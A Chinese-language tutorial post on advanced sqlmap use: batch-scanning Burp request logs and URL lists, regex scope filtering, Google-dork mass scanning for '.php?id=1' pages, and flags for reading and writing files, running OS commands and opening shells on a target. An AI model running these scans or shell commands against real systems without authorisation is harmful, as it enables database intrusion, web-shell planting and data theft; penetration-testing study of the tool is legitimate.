工具 | sqlmap系列(四)高级篇文章

一.批量化扫描burp的请求日记

01.首先配置burp记录所有的request请求,并保存在指定文件夹,如我保存在sqlmap目录下名为sql.txt。

工具 | sqlmap系列(四)高级篇文章_第1张图片

02.接着浏览器设置burp代理,访问测试url,查看sql.txt。

工具 | sqlmap系列(四)高级篇文章_第2张图片

3.使用sqlmap扫描

sqlmap.py -l sql.txt --batch -smart

Batch:会自动选择yes

Smart:启发式快速判断,节约时间

工具 | sqlmap系列(四)高级篇文章_第3张图片

偷懒的做法,最好不要--batch -samrt了,会错过很多选项导致注入失败。扫描结果可以到C:\Users\Administrator\.sqlmap\output去查看。

二.批量扫描文本中的多个目标

文本中保存url格式如下,sqlmap会一个个检测。

工具 | sqlmap系列(四)高级篇文章_第4张图片

sqlmap.py -m url.txt

工具 | sqlmap系列(四)高级篇文章_第5张图片

三.利用正则过滤目标网址

为什么过滤目标网址,前面批量扫是让我们扫描burp的请求耶,那这么多请求,有的请求并非是我们要扫描的网址怎么办?用正则干掉他吧!!!

参数:--scope

例如:只想要www开头,.com/.net/.org结尾的网址

python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

更多的看各位正则的功底啦。


四.利用谷歌批量扫

如首先用谷歌搜索.php?id=1结尾的URL,然后进行注入测试。

sqlmap.py -g "inurl:\".php?id=1\""

工具 | sqlmap系列(四)高级篇文章_第6张图片

五.关于文件写入与shell获取

--sql-shell #执行指定sql命令

--sql-query #执行指定的sql语句

--file-read#读取指定文件

--file-write #写入本地文件

(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)

--file-dest #要写入的文件绝对路径

--os-cmd=id#执行系统命令

--os-shell #系统交互shell

--reg-read#读取win系统注册表


六.总结

此次主要介绍批量化扫描的几个方式,关于文件写入和shell获取,由于我实验环境权限存在问题,所以只是简单的列出命令,希望小伙伴有执行成功的能够告诉斗哥一声啊。好了,sqlmap系列基本也就要告一个段落了,而sqlmap本身还有很多的东西值得我们学习,虽然分成了4个系列,但是只是说如何使用这个工具罢了,还有很多奇淫巧技斗哥也还没有get到,有机会大家一起讨论吧。

你可能感兴趣的:(工具 | sqlmap系列(四)高级篇文章)